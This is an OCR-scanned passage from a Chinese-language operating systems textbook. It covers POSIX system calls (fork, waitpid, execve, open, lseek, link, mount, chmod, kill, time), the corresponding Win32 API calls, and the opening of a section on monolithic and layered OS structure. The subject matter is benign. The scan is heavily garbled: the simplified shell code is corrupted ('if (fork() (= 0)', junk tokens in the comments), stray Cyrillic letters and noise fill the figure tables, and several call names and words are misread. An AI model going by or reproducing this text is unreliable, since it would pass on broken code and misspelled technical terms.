з = chmodlname, mode) 修改 一 个 文件 的 保护 位 _ 
з = kill(pid, signal) 发 送信 号 给 一 个 进程 
|_ seconds =time(&seconds) 自 1970 年 1 月 1 日 起 的 流逝 时 间 


图 1-18 一 些 重要 的 POSIX 系 统 调用 。 若 出 错 则 返回 代码 s 为 1。 返回 代码 如 下 : Pid 是 进程 的 4d，fd 是 文 
件 描述 符 ，n 是 字 节 数 ，position 是 在 文件 中 的 偏 移 量 ， 而 seconds 是 流 浙 时 间 。 参数 在 表 中 解释 


有 必要 指出 ， 将 POSIX 过 程 映射 到 系统 调用 并 不 是 一 对 一 的 。 POSIX 标 准 定义 了 构造 系统 所 必须 
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提供 的 一 套 过 程 ， 但 是 并 没有 规定 它们 是 系统 调用 ， 是 库 调用 还 是 其 他 的 形式 。 如 果 不 通 过 系统 调用 就 
可 以 执行 一 个 过 程 〈 即 无 须 陷 人 内 核 )， 那 么 从 性 能 方面 考虑 ， 它 通常 会 在 用 户 空间 中 完成 。 不 过 ， 多 
数 POSIX 过 程 确实 进行 系统 调用 ， 通 常 是 一 个 过 程 直接 映射 到 一 个 系统 调用 上 。 在 有 一 些 情形 下 ， 特 别 
是 所 需要 的 过 程 仅仅 是 某 个 调用 的 变 体 时 ， 此 时 一 个 系统 调用 会 对 应 若干 个 库 调用 。 


1.6.1 用 于 进程 管理 的 系统 调用 

在 图 1-18 中 的 第 一 组 调用 处 理 进程 管理 。 将 有 关 fork (派生 ) 的 讨论 作为 本 节 的 开始 是 较为 合适 的 。 
在 UNIX 中 ，fork 是 惟一 可 以 在 POSIX 创 建 进程 的 途径 。 它 创建 一 个 原 有 进程 的 精确 副本 ， 包 括 所 有 的 文 
件 描述 符 ， 寄 存 器 等 全 部 内 容 。 在 fork 之 后 ， 原 有 的 进程 及 其 副本 ( 父 与 子 ) 就 分 开 了 。 在 fork 时 ， 所 
有 的 变量 具有 一 样 的 值 ， 虽 然 父 进程 的 数据 被 复制 用 以 创建 子 进 程 ， 但 是 其 中 一 个 的 后 续 变 化 并 不 会 影 
响 到 另 一 个 。( 由 父 进 程 和 子 进程 共享 的 程序 正文 ， 是 不 可 改变 的 .) fork 调 用 返回 一 个 值 ， 在 子 进程 中 
该 值 为 零 ， 并 且 等 于 子 进程 的 进程 标识 符 ， 或 等 于 父 进程 中 的 PID。 使 用 被 返回 的 PID， 就 可 以 在 两 个 
进程 中 看 出 哪 一 个 是 父 进程 ， 哪 一 个 是 子 进程 。 

多 数 情形 下 ， 在 fork 之 后 ， 子 进程 需要 执行 与 父 进 程 不 同 的 代码 。 这 里 考虑 shell 的 情形 。 它 从 终端 
读 取 命 令 ， 创 建 一 个 子 进程 ， 等 待 该 子 进程 执行 命令 ， 在 该 子 进程 终止 时 ， 读 入 下 一 条 命令 。 为 了 等 待 
子 进程 结束 ， 父 进程 执行 一 个 waitpid 系 统 调用 ， 它 只 是 等 待 ， 直 至 子 进程 终止 (车 有 多 个 子 进程 存在 的 
话 ， 则 直至 任何 一 个 子 进程 终止 )。waitpid 可 以 等 待 一 个 特定 的 子 进程 ， 或 者 通过 将 第 一 个 参数 设 为 -1 
的 方式 ， 从 而 等 待 任何 一 个 老 的 子 进程 。 在 waitpid 完 成 之 后 ， 将 把 第 二 个 参数 statloc 所 指向 的 地 址 设置 
为 子 进程 的 退出 状态 (正常 或 异常 终止 以 及 退出 值 )。 有 各 种 可 使 用 的 选项 ， 它 们 由 第 三 个 参数 确定 。 

现在 考虑 shell 如 何 使 用 fork。 在 键 人 一 条 命令 后 ，shell 创 建 一 个 新 的 进程 。 这 个 子 进程 必须 执行 用 
户 的 命令 。 通 过 使 用 execve 系 统 调用 可 以 实现 这 一 点 ， 这 个 系统 调用 会 引起 其 整个 核心 映像 被 一 个 文件 
所 替代 ， 该 文件 由 第 一 个 参数 给 定 。( 实 际 上 ， 该 系统 调用 自身 是 exec 系 统 调用 ， 但 是 若干 个 不 同 的 库 
过 程 使 用 不 同 的 参数 和 稍 有 差别 的 名 称 调用 该 系统 调用 。 在 这 里 ， 我 们 都 把 它们 视 为 系统 调用 。 ) 在 图 
1-19 中 ， 用 一 个 高 度 简化 的 shell 说 明 fork、waitpid 以 及 execve 的 使 用 。 


#define TRUE 1 
while (TRUE) { D 一 直 循环 下 去 */ 
type-prompt( ); /在 屏幕 上 显示 提示 符 */ 
read-command(command, parameters); |» 从 终端 读 取 输 入 */ 
if (fork() (= 0) { h 派生 子 进程 */ 
de 父 代码 */ 
waitpid(-1, &status, 0); /#* 等 待 子 进程 退出 wy 
j езе { 
ж FRE 
execve(command, parameters, 0); * WRG 
} 
} 


图 1-19 一 条 shell (在 本 书 中 ，TRUE 都 被 定义 为 1) 


在 最 一 般 情形 下 ，execve 有 三 个 参数 : 将 要 执行 的 文件 名 称 ， 一 个 指向 变量 数组 的 指针 ， 以 及 一 
个 指向 环境 数组 的 指针 。 这 里 对 这 些 参数 做 一 个 简要 的 说 明 。 各 种 库 例 程 ， 包 括 execl、execv、execle 
以 及 execve， 可 以 允许 略 掉 参 数 或 以 各 种 不 同 的 方式 给 定 。 在 本 书 中 ， 我 们 在 所 有 涉及 的 地 方 使 用 exec 
描述 系统 调用 。 

下 面 考 虑 诸如 

cp е1 fle2 
的 命令 ， 该 命令 将 filel 复制 到 file2。 在 shell 创建 进程 之 后 ， 该 子 进程 定位 和 执行 文件 cp， 并 将 源 文件 
名 和 目标 文件 名 传递 给 它 。 

cp 主 程序 (以 及 多 数 其 他 C 程 序 的 主 程序 ) 都 有 声明 
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main(argc, argv, envp) 

其 中 arge 是 该 命令 行内 有 关 参 数 数目 的 计数 器 ， 包 括 程序 名 称 。 例 如 ， 上 面 的 例子 中 ，argc 为 3。 

第 二 个 参数 argv 是 一 个 指向 数组 的 指针 。 该 数组 的 元 素 是 指向 该 命令 行 第 个 字 串 的 指针 。 在 本 例 
中 ，argv[0] 指 向 字 串 “cp”, argv[1] 指 向 字符 串 “file1"，argv[2] 指 向 字符 申 “file2”。 

main 的 第 三 个 参数 envp 指 向 环境 的 一 个 指针 ， 该 环境 是 一 个 数组 ， 含 有 name = value 的 赋值 形式 ， 
用 以 将 诸如 终端 类 型 以 及 根 目录 等 信息 传送 给 程序 。 还 有 供 程序 可 以 调用 的 库 过 程 ， 用 来 取得 环境 变量 ， 
这 些 变量 通常 用 来 确定 用 户 希望 如 何 完成 特定 的 任务 (例如 ， 使 用 默认 打印 机 )。 在 图 1-19 中 ， 没 有 环 
境 参数 传递 给 予 进程 ， 所 以 execve 的 第 三 个 参数 为 零 。 地 址 (HARM) 

如 果 读 者 认为 exec 过 于 复杂 ， 那 么 也 不 要 失望 。 这 是 在 POSIX 的 全 FFFF 
部 (语义 上 ) 系统 调用 中 最 复杂 的 一 个 ， 其 他 的 都 非常 简单 。 作 为 一 个 
简单 例子 ， 考 虑 exit， 这 是 在 进程 完成 执行 后 应 执行 的 系统 调用 。 这 个 
系统 调用 有 一 个 参数 ， 退 出 状态 (0 至 255) ， 该 参数 通过 waitpid 系 统 调 
用 中 的 statloc 返 回 给 父 进程 。 

在 UNIX 中 的 进程 将 其 存储 空间 划分 为 三 段 : 正文 段 ( 如 程序 代码 )、 
数据 段 (如 变量 ) 以 及 堆栈 段 。 数 据 段 向 上 增长 而 堆栈 向 下 增长 ， 如 图 
1-20 所 示 。 夹 在 中 间 的 是 未 使 用 的 地 址 空间 。 堆 栈 在 需要 时 自动 地 向 中 图 1-20 进程 有 三 段 正文 段 、 
间 增 长 ， 不 过 数据 段 的 扩展 是 显 式 地 通过 系统 调用 brk 进 行 的 ， 在 数据 数据 段 和 堆栈 段 
段 扩充 后 ， 该 系统 调用 指定 一 个 新 地 址 。 但 是 ， 这 个 调用 不 是 POSIX 标 准 中 定义 的 调用 ， 对 于 存储 器 的 
动态 分 配 ， 我 们 鼓励 程序 员 使 用 malloc 库 过 程 ， 而 malloc 的 内 部 实现 则 不 是 一 个 适合 标准 化 的 主题 ， 因 
为 几乎 没有 程序 员 直接 使 用 它 ， 我 们 有 理由 怀疑 ， 会 有 什么 人 注意 到 brk 实 际 不 是 属于 POSIX 的 。 


1.6.2 用 于 文件 管理 的 系统 调用 

许多 系统 调用 与 文件 系统 有 关 。 本 小 节 讨论 在 单个 文件 上 的 操作 ， 1.6.3 节 将 讨论 与 目录 和 整个 文件 
系统 有 关 的 内 容 。 

要 读 写 一 个 文件 ， 先 要 使 用 open 打 开 该 文件 。 这 个 系统 调用 通过 绝对 路 径 名 或 指向 工作 目录 的 相 
对 路 径 名 指定 要 打开 文件 的 名 称 ， 而 代码 O_RDONLY、O_WRONLY 或 O_ RDWR 的 含义 分 别 是 读 、 写 或 
两 者 。 为 了 创建 一 个 新 文件 ， 使 用 O_CREAT 参 数 。 然 后 可 使 用 返回 的 文件 描述 符 进行 读 写 操作 。 接着 ， 
可 以 用 close 关 闭 文件 ， 这 个 调用 使 得 该 文件 描述 符 在 后 续 的 open 中 被 再 次 使 用 。 

毫 无 疑问 ， 最 常用 的 调用 是 read 和 write。 我 们 在 前 面 已 经 讨论 过 read。write 具 有 与 read 相 同 的 参数 。 

尽管 多 数 程序 频繁 地 读 写 文件 ， 但 是 仍 有 一 些 应 用 程序 需要 能 够 随机 访问 一 个 文件 的 任意 部 分 。 与 
每 个 文件 相关 的 是 一 个 指向 文件 当前 位 置 的 指针 。 在 顺序 读 ( 写 ) 时 ， 该 指针 通常 指向 要 读 出 (5A) 
的 下 一 个 字 节 。lseek 调 用 可 以 改变 该 位 置 指针 的 值 ， 这 样 后 续 的 read 或 write 调用 就 可 以 在 文件 的 任何 
地 方 开始 。 

lseek 有 三 个 参数 : 第 一 个 是 文件 的 描述 符 ， 第 二 个 是 文件 位 置 ， 第 三 个 说 明 该 文件 位 置 是 相对 于 文 
件 起 始 位 置 、 当 前 位 置 ， 还 是 文件 的 结尾 。 在 修改 了 指针 之 后 ， lseek 所 返回 的 值 是 文件 中 的 绝对 位 置 。 

UNIX 为 每 个 文件 保存 了 该 文件 的 类 型 (普通 文件 、 特 殊 文件 、 目 录 等 )， 大 小 ， 最 后 修改 时 间 以 及 
其 他 信息 。 程 序 可 以 通过 stat 系 统 调用 查看 这 些 信息 。 第 一 个 参数 指定 了 要 被 检查 的 文件 ， 第 二 个 参数 是 
一 个 指针 ， 该 指针 指向 用 来 存放 这 些 信息 的 结构 。 对 于 一 个 打开 的 文件 而 言 ， fstat 调 用 完成 同样 的 工作 。 


1.6.3 用 于 目录 管理 的 系统 调用 

本 节 我 们 讨论 与 目录 或 整个 文件 系统 有 关 的 某 些 系统 调用 ， 而 不 是 1.6.2 节 中 与 一 个 特定 文件 有 关 的 
系统 调用 。mkdir 和 rmdir 分 别 用 于 创建 和 删除 空 目录 。 下 一 个 调用 是 link。 它 的 作用 是 允许 同 一 个 文件 
以 两 个 或 多 个 名 称 出 现 ， 多 数 情形 下 是 在 不 同 的 目录 中 这 样 做 。 它 的 典型 应 用 是 ， 在 同 一 个 开发 团队 中 
人 允许 若干 个 成 员 共享 一 个 共同 的 文件 ， 他 们 之 中 的 每 个 人 都 在 自己 的 目录 中 有 该 文件 ， 但 可 能 采用 的 是 
不 同 的 名 称 。 共 享 一 个 文件 ， 与 每 个 团队 成 员 都 有 一 个 私 用 副本 并 不 是 同一 件 事 ， 因为 共享 文件 意味 着 ， 
任何 成 员 所 做 的 修改 都 立即 为 其 他 成 员 所 见 一 一 只 有 一 个 文件 存在 。 而 在 复制 了 一 个 文件 的 多 个 副本 之 
后 ， 对 其 中 一 个 副本 所 进行 的 修改 并 不 会 影响 到 其 他 的 副本 。 
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为 了 考察 link 是 如 何 工作 的 ， 考 虑 图 1-21a 中 的 情形 。 有 两 个 用 户 ，ast 和 jim， 每 个 用 户 都 有 一 些 文 
件 的 目录 。 若 ast 现 在 执行 一 个 含有 系统 调用 的 程序 

link("/usr/jim/memo","usr/ast/note"); 
在 jim 目 录 中 的 文件 memo， 以 文件 名 note 进 入 ast 的 目录 。 之 后 ，/usr/jim/memo 和 /usr/ast/note 都 引用 相同 
的 文件 。 顺 便 提 及 ， 用 户 是 将 目录 保存 在 /usr、/user、/home 还 是 其 他 地 方 ， 则 完全 取决 于 本 地 系统 管理 
员 的 决定 。 

理解 link 是 如 何 工作 的 也 许 有 助 于 读者 看 清 其 作用 。 在 UNIX 中 ， 每 个 文件 都 有 惟一 的 编号 ， 即 i- 编 
号 ， 用 以 标识 文件 。 该 -编号 是 对 i- 节 点 表格 的 一 个 引用 ， 它 们 一 一 对 应 ， 说 明 该 文件 的 拥有 者 ， 磁 盘 
块 的 位 置 等 。 一 个 目录 就 是 包含 了 (GAS, ASCAR) 对 集合 的 一 个 文件 。 在 UNIX 的 第 一 个 版 本 中 ， 
每 个 目录 项 有 16 个 字 节 一 一 2 个 字 节 用 于 i- 编 号 ，14 个 字 节 用 于 名 称 。 现 在 为 了 支持 长 文件 名 ,采用 了 更 
复杂 的 结构 ， 但 是 ， 在 概念 上 ， 目 录 仍 然 是 (i- 编 号 ，ASCII 名 称 ) 对 的 一 个 集合 。 在 图 1-21 中 ，mail 为 
i- 编 号 16， 等 等 。link 所 做 的 只 是 利用 某 个 已 有 文件 的 i- 编 号 ， 创 建 一 个 新 目录 项 (也许 用 一 个 新 名 称 )。 
在 图 1-21b 中 两 个 目录 项 有 相同 的 i- 编 号 (70)， 从 而 指向 同一 个 文件 。 如 果 其 中 菜 一 个 文件 后 来 被 移 走 
了 ， 使 用 unlink 系 统 调用 ， 可 以 保留 另 一 个 。 如 果 两 个 都 被 移 走 了 ，UNIX 00 看 到 尚 存在 的 文件 没有 目 
录 项 (i- 节 点 中 的 一 个 域 记 录 着 指向 该 文件 的 目录 项 )， 就 会 把 该 文件 从 磁盘 中 移 去 。 


/lusr/ast /usr/im Jusr/ast yusriim 


a) b) 
图 1-21 а) 将 /usjim/memo 链 接 到 ast 目 录 之 前 的 两 个 目录 ，b) 链接 之 后 的 两 个 目录 


正如 我 们 已 经 叙述 过 的 ，mount 系 统 调用 允许 将 两 个 文件 系统 合并 成 为 一 个 。 通 常 的 情形 是 ， 在 硬 
盘 上 的 根 文件 系统 含有 常用 命令 的 二 进 制 ( 可 执行 ) 版 和 其 他 常用 的 文件 。 用 户 可 在 CD-ROM 驱 动 器 中 
插入 包含 有 需要 读 入 文件 的 CD-ROM 盘 。 

通过 执行 mount 系 统 调用 ， 可 以 将 一 个 CD-ROM 文 件 系统 添加 到 根 文件 系统 中 ， 如 图 1-22 所 示 。 完 
成 安装 操作 的 典型 C 语 句 为 

mount("/dev/fd0","/mnt",0); 
这 里 ， 第 一 个 参数 是 驱动 器 0 的 块 特殊 文件 名 称 ， 第 二 个 参数 是 要 被 安装 在 树 中 的 位 置 ， 第 三 个 参数 说 
明 将 要 安装 的 文件 系统 是 可 读 写 的 还 是 只 读 的 。 


а) b) 
图 1-22 а) 安装 前 的 文件 系统 ，b) 安装 后 的 文件 系统 


在 mount 调 用 之 后 ， 驱 动 器 0 上 的 文件 可 以 使 用 从 根 目录 开始 的 路 径 或 工作 目录 路 径 ， 而 不 用 考虑 
文件 在 哪个 驱动 器 上 。 事 实 上 ， 第 二 个 、 第 三 个 以 及 第 四 个 驱动 器 也 可 安装 在 树 上 的 任何 地 方 。mount 
调用 使 得 把 可 移动 介质 都 集中 到 一 个 文件 层次 中 成 为 可 能 ， 而 不 用 考虑 文件 在 哪个 驱动 器 上。 尽管 这 是 
个 CD-ROM 的 例子 ， 但 是 也 可 以 用 同样 的 方法 安装 硬盘 或 者 硬盘 的 一 部 分 ( 常 称 为 分 区 或 次 级 设备 )， 
外 部 硬盘 和 USB 盘 也 一 样 。 当 不 再 需要 一 个 文件 系统 时 ， 可 以 用 umount 系 统 调用 印 载 之 。 
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1.6.4 各 种 系统 调用 В 

有 各 种 的 系统 调用 。 这 里 介绍 系统 调用 中 的 一 部 分 。 chdir 调 用 改变 当前 的 工作 目录 。 在 调用 

chdir("/usr/ast/test"); 

之 后 ， 打 开 xyz 文 件 ， 会 打开 /usrlasUtesyxyz。 工 作 目 录 的 概念 消除 了 总 是 键 人 (长 ) 绝对 路 径 名 的 需要 。 

在 UNIX 中 ， 每 个 文件 有 一 个 保护 模式 。 该 模式 包括 针对 所 有 者 、 组 和 其 他 用 户 的 读 一 号 一 执行 位 。 
chmod 系 统 调用 可 以 改变 文件 的 模式 。 例如， 要 使 一 个 文件 对 除 了 所 有 者 之 外 的 用 户 只 读 ， 可 以 执行 

chmod("file",0644); 

kil 系 统 调用 供用 户 或 用 户 进程 发 送信 号 用 。 车 一 个 进程 准备 好 捕捉 一 个 特定 的 信号 ， 那 么 ， 在 信号 到 来 
时 ， 运 行 一 个 信号 处 理 程序 。 如 果 该 进程 没有 准备 好 ， 那么 信号 的 到 来 会 杀 掉 该 进程 (此 调用 名 称 的 由 来 )。 

POSIX 定 义 了 若干 处 理 时 间 的 过 程 。 例 如 ， time 以 秒 为 单位 返回 当前 时 间 ，0 对 应 着 1970 年 1 月 1 日 
午夜 〈 从 此 日 开始 ， 没 有 结束 ) 。 在 一 台 32 位 字 的 计算 机 中 ， time 的 最 大 值 是 2*-1 秒 (假设 是 无 符号 整 
数 )。 这 个 数字 对 应 136 年 多 一 点 。 所 以 在 2106 年 ， 32 位 的 UNIX 系 统 会 发 狂 ， 与 在 2000 年 造成 对 世界 计 
算 机 严重 破坏 的 知名 的 Y2K 问 题 是 类 似 的 。 如 果 读 者 现在 有 32 位 UNIX 系 统 ， 建议 在 2106 年 之 前 的 某 时 
刻 更 换 为 64 位 的 系统 。 

1.6.5 Windows Win32 API 

到 目前 为 止 ， 我 们 主要 讨论 的 是 UNIX 系 统 。 现在 简要 地 考察 Windows。Windows 和 UNIX 的 主要 差 
别 在 于 编程 方式 。 一 个 UNIX 程 序 包括 做 各 种 处 理 的 代码 以 及 从 事 完成 特定 服务 的 系统 调用 。 相反 ， 一 
个 Windows 程 序 通常 是 一 个 事件 驱动 程序 。 其 中 主 程序 等 待 某 些 事件 发 生 ， 然 调用 一 个 过 程 处 理 该 事 
件 。 典 型 的 事件 包括 被 项 击 的 键 、 移 动 的 鼠标 、 被 按 下 的 鼠标 或 插入 的 CD-ROM。 调 用 事件 处 理 程序 
理事 件 ， 刷 新 屏幕 ， 并 更 新 内 部 程序 状态 。 总 之 ， 这 是 与 UNIX 不 同 的 程序 设计 风格 ， 由 于 本 书 专注 于 
操作 系统 的 功能 和 结构 ， 这 些 程序 设计 方式 上 的 差异 就 不 过 多 涉及 了 。 

当然 ， 在 Windows 中 也 有 系统 调用 。 在 UNIX 中 ， 系统 调用 (如 read) 和 系统 调用 所 使 用 的 库 过 程 
(如 read) 之 间 几 乎 是 一 一 对 应 的 关系 。 换 名 话说， 对 于 每 个 系统 调用 ， 差 不 多 就 涉及 一 个 被 调用 的 1 
过 程 ， 如 图 1-17 所 示 。 此 外 ， POSIX 有 约 100 个 过 程 调用 。 

在 Windows 中 ， 情 况 就 大 不 相同 了 。 首 先 ， 库 调用 和 实际 的 系统 调用 是 几乎 不 对 应 的 。 微 软 定义 了 
一 套 过 程 ， 称 为 应 用 编程 接口 (Application Program Interface, Win32 АРІ), ， 程 序 员 用 这 套 过 程 获得 操 
作 系统 的 服务 。 从 Windows 95 开 始 的 所 有 Windows 版 本 都 (或 部 分 ) 支持 这 个 接口 。 由 于 接口 与 实际 的 
系统 调用 不 对 应 ， 微 软 保留 了 随 着 时 间 (甚至 随 着 版 本 到 版 本 ) 改变 实际 系统 调用 的 能 力 ， 防止 使 已 有 
的 程序 失效 。 由 于 Windows 2000、Windows XP 和 Windows Vista 中 有 许多 过 去 没有 的 新 调用 ， 所 以 究竟 
Win32 是 由 什么 构成 的 ， 这 个 问题 的 答案 仍然 是 含混 不 清 的 。 在 本 节 中 ， Win32 表 示 所 有 Windows 版 本 
都 支持 的 接口 。 

Win32 АРІ 调用 的 数量 是 非常 大 的 ， 数 量 有 数 千 个 。 此 外 ， 尽管 其 中 许多 确实 涉及 系统 调用 ， 但 有 
一 大 批 Win32 API 完 全 是 在 用 户 空间 进行 。 结 果 ， 在 Windows 中 ， 不 可 能 了 解 哪 一 个 是 系统 调用 (如 由 
内 核 完成 )， 哪 一 个 只 是 用 户 空间 中 的 库 调用 。 事实 上 ， 在 某 个 版 本 中 的 一 个 系统 调用 ， 会 在 另 一 个 不 
同 版 本 中 的 用 户 空间 中 执行 ， 或 者 相反 。 当 我 们 在 本 书 中 讨论 Windows 的 系统 调用 时 ， 将 使 用 Win32 过 
程 (在 合适 之 处 )， 这 是 因为 微软 保证 ， 随 着 时 间 流逝 ， Win32 过 程 将 保持 稳定 。 但 是 读者 有 必要 记 住 ， 
它们 并 不 全 都 是 系统 调用 ( 即 陷入 到 内 核 中 )。 

Win32 API 中 有 大 量 的 调用 ， 用 来 管理 视窗 、 几 何 图 形 、 文本 、 字 型 、 滚 动 条 、 对 话 框 、 菜 单 以 及 
GUI 的 其 他 功能 。 为 了 使 图 形 子 系统 在 内 核 中 运行 ( 某 些 ndows 版 本 中 确实 是 这 样 ， 但 不 是 所 有 的 版 
本 )， 需 要 系统 调用 ， 否 则 只 有 库 调用 。 在 本 书 中 是 否 应 该 讨论 这 些 调用 呢 ? 由 于 它们 并 不 是 同 操作 系 
统 的 功能 相关 ， 我 们 还 是 决定 不 讨论 它们 ， 尽管 它们 会 在 内 核 中 运行 。 对 Win32 API 有 兴趣 的 读者 应 该 
参阅 一 些 书籍 中 的 有 关内 容 ，( 例 如 ，Hart，1997，Rector 和 Newcomer， 1997, Simon, 1997), 

我 们 在 这 里 介绍 所 有 的 Win32 API, 不 过 这 不 是 我 们 关心 问题 的 所 在 ， 所 以 我 们 做 了 一 些 限制 ， 只 
将 那些 与 图 1-18 中 UNIX 系 统 调用 大 致 对 应 的 Windows 调 用 列 在 图 1-23 中 。 
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UNIX Wins2 | 说 明 = 
tork | CreateProcess | 创建 一 个 新 进程 ан 
waitpid | WaitForSingleObject| ”可 等 待 一 个 进程 退出 _ 

execve | (none) | CreateProcess = fork + execve Е 
ext | ExitProcess _ | 终止 执行 _ _ У] 
open “| CreateFile 创建 一 个 文件 或 打开 一 个 已 有 的 文件 Е 
[close | CloseHandie 关闭 一 个 文件 ___ 

read | ReadFile 从 一 个 文件 读数 据 Ei! 
write | WriteFile 把 数据 写 入 一 个 文件 

lseek | SetFilePointer 移动 文件 指针 

stat GetFileAttributesEx | 取得 文件 的 属性 
| mkdir | CreateDirectory 创建 一 个 新 目录 j 
rmdir “| RemoveDirectory 副 除 一 个 空 目录 А 
link (none) _ Win32 不 支持 link 

unlink | DeleteFile 毁 掉 一 个 已 有 的 文件 

mount | (попе) | Win32 不 支持 mount 

umount | (none) _ | Win32 不 支持 umount 

chdir SetCurrentDirectory | 改变 当前 工作 目录 = | 
chmod | (none) | Win32 不 支持 安全 性 (但 NT 支持 ) 

кї (попе) Win32 不 支持 信号 

time _ | GetLocalTime | 获得 当前 时 间 


图 1-23 与 图 1-18 中 UNIX 调 用 大 致 对 应 的 Win32 АРІ 调用 


下 面 简要 地 说 明 一 下 图 1-23 中 表格 的 内 容 。CreateProcess 为 创建 一 个 新 进程 ， 它 把 UNIX 中 的 fork 
和 execve 结 合 起 来 。 它 有 许多 参数 用 来 指定 新 创建 进程 的 性 质 。Windows 中 没有 类 似 UNIX 中 的 进程 层 
次 ， 所 以 不 存在 父 进程 和 子 进程 的 概念 。 在 进程 创建 之 后 ， 创 建 者 和 被 创建 者 是 平等 的 。 
WaitForSingleObject 用 于 等 待 一 个 事件 ， 等 待 的 事件 可 以 是 多 种 可 能 的 事件 。 如 果 有 参数 指定 了 其 个 
进程 ， 那 么 调用 者 等 待 所 指定 的 进程 退出 ， 这 通过 使 用 ExitProcess 完 成 。 

接着 的 六 个 调用 进行 文件 操作 ， 在 功能 上 和 它们 的 UNIX 对 应 调用 类 似 ， 尽 管 在 参数 和 细节 上 它们 
都 是 不 同 的 。 和 在 UNIX 中 一 样 ， 文 件 可 被 打开 、 关 闭 和 写 人 。SetFilePointer 以 及 GetFileAttributesEx 
调用 设置 文件 的 位 置 并 取得 文件 的 一 些 属性 。 

Windows 中 有 目录 ， 目 录 可 以 分 别 用 CreateDirectory 以 及 RemoveDirectory API 调 用 创建 和 删 去 。 
也 有 对 当前 目录 的 标记 ， 这 可 以 通过 SetCurrentDirectory 来 设置 。 使 用 GetLocalTime 可 获得 当前 时 间 。 

Win32 接 口中 没有 文件 的 链接 、 文 件 系统 的 安装 、 安 全 属性 或 信号 ， 所 以 对 应 于 UNIX 中 的 这 些 调 
用 就 不 存在 了 。 当 然 ，Win32 中 也 有 大 量 的 在 UNIX 中 不 存在 的 其 他 调用 ， 特 别 是 管理 GUI 的 种 种 调用 。 
不 过 在 Windows Vista 中 有 了 精心 设计 的 安全 系统 ， 而 且 也 支持 文件 的 链接 。 

也 许 有 必要 对 Win32 做 一 个 最 后 的 说 明 。Win32 并 不 是 非常 统一 的 或 有 一 致 的 接口 。 其 主要 原因 是 
由 于 Win32 需 要 与 早期 的 在 Windows 3.x 中 使 用 的 16 位 接口 向 后 兼容 。 


1.7 操作 系统 结构 

我 们 已 经 分 析 了 操作 系统 的 外 部 〈 如 ， 程 序 员 接口 )， 现 在 是 分 析 其 内 部 的 时 候 了 。 在 下 面 的 小 池 
中 ， 为 了 对 各 种 可 能 的 方式 有 所 了 解 ， 我 们 将 考察 已 经 党 试 过 的 六 种 不 同 的 结构 设计 。 这 样 做 并 没有 穷 
尽 各 种 结构 方式 ， 但 是 至 少 给 出 了 在 实践 中 已 经 试验 过 的 一 些 设计 思想 。 这 六 种 设计 是 ， 单 体系 统 、 层 
次 系统 、 微 内 核 、 客 户 机 -服务 器 系统 、 虚 拟 机 和 exokernels 等 。 
171 单 体系 统 


到 目前 为 止 ， 在 多 数 常见 的 组 织 形式 的 处 理 方式 中 ， 全 部 操作 系统 在 内 核 态 中 以 单一 程序 的 方式 运 
行 。 整 个 操作 系统 以 过 程 集合 的 方式 编写 ， 链 接 成 一 个 大 型 可 执行 二 进 制程 序 。 使 用 这 种 技术 ， 系 统 中 
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每 个 过 程 可 以 自由 调用 其 他 过 程 ， 只 要 后 者 提供 了 前 者 所 需要 的 一 些 有 用 的 计算 工作 。 这 些 可 以 不 受 限 
制 彼此 调用 的 成 千 个 过 程 ， 常 常 导致 出 现 一 个 笨拙 和 难于 理解 的 系统 。 

在 使 用 这 种 处 理 方式 构造 实际 的 目标 程序 时 ,首先 编译 所 有 单个 的 过 程 , 或 者 编译 包含 过 程 的 文件 ， 
然后 通过 系统 链接 程序 将 它们 链接 成 单一 的 目标 文件 。 依 靠 对 信息 的 隐藏 处 理 ， 不 过 在 这 里 实际 上 是 不 
存在 的 ， 每 个 过 程 对 其 他 过 程 都 是 可 见 的 〈 相 反 的 构造 中 有 模块 或 包 ， 其 中 多 数 信息 隐藏 在 模块 之 中 ， 
而 且 只 能 通过 正式 设计 的 人 口 点 实现 模块 的 外 部 调用 ) 。 

但 是 ， 即 使 在 单 体系 统 中 ， 也 可 能 有 一 些 结构 存在 。 可 以 将 参数 放置 在 良好 定义 的 位 置 ( 如 ， 栈 )， 
通过 这 种 方式 ， 向 操作 系统 请 求 所 能 提供 的 服务 (系统 调用 ) ， 然 后 执行 一 个 陷阱 指令 。 这 个 指令 将 机 
器 从 用 户 态 切换 到 内 核 态 并 把 控制 传递 给 操作 系统 ， 如 图 1-17 中 第 6 步 所 示 。 然 后 ， 操作 系统 取出 参数 
并 且 确 定 应 该 执行 哪 一 个 系统 调用 。 随 后 ， 它 在 一 个 表格 中 检索 ， 在 该 表格 的 k 模 中 存放 着 指向 执行 系 
统 调用 k 过 程 的 指针 (图 1-17 中 第 7 步 )。 

对 于 这 类 操作 系统 的 基本 结构 ， 有 着 如 下 结构 上 的 建议 : 

1) 需要 一 个 主 程序 ， 用 来 处 理 服务 过 程 请 求 。 

习 需 要 一 套 服务 过 程 ， 用 来 执行 系统 调用 。 

3) 需 要 一 套 实用 过 程 ， 用 来 辅助 服务 过 程 。 
在 该 模型 中 ， 每 一 个 系统 调用 都 通过 一 个 服务 
过 程 为 其 工作 并 运行 之 。 要 有 一 组 实用 程序 来 
完成 一 些 服务 过 程 所 需要 用 到 的 功能 ， 如 从 用 
户 程序 取 数据 等 。 可 将 各 种 过 程 划分 为 一 个 三 
层 的 模型 ， 如 图 1-24 所 示 。 

除了 在 计算 机 初 启 时 所 装载 的 核心 操作 系 
统 外 ， 许 多 操作 系统 支持 可 装载 的 扩展 ， 诸 如 
1/0 设 备 驱 动 和 文件 系统 。 这 些 部 件 可 以 按 昭 
HERA. 


17.2 层次 式 系统 

把 图 1-24 中 的 系统 进一步 通用 化 ， 就 变 成 一 个 层次 式 结构 的 操作 系统 ， 它 的 上 层 软 件 都 是 在 下 一 层 
软件 的 基础 之 上 构建 的 。E. W. Dijkstra 和 他 的 学 生 在 荷兰 的 Eindhoven 技 术 学 院 所 开发 的 THE 系 统 (1968), 
是 按 此 模型 构造 的 第 一 个 操作 系统 。THE 系 统 Е 


图 1-24 简单 的 单 体系 统 结构 模型 


是 为 荷兰 的 一 种 计算 机 ，Electrologica X8， 配 [z3 功 能 

备 的 一 个 简 单 的 批 处 理 系统 ， 其 内 存 只 有 P AEn 

32K 个 字 ， 每 字 27 位 (二进制 位 在 那 时 是 很 КИЙЕ УУГ 

PRH). 2 操作 员 - 进 程 通信 了] 
该 系统 共 分 为 六 层 ， 如 图 1-25 所 示 。 处理 | | жйттайтт _ 

器 分 配 在 第 0 层 中 进行 ， 当 中 断 发 生 或 定时 器 Lo | жяалатажетан 


到 期 时 ， 由 该 层 进行 进程 切换 。 在 第 0 层 之 上 ， 图 1-25 THE 操 作 系统 的 结构 
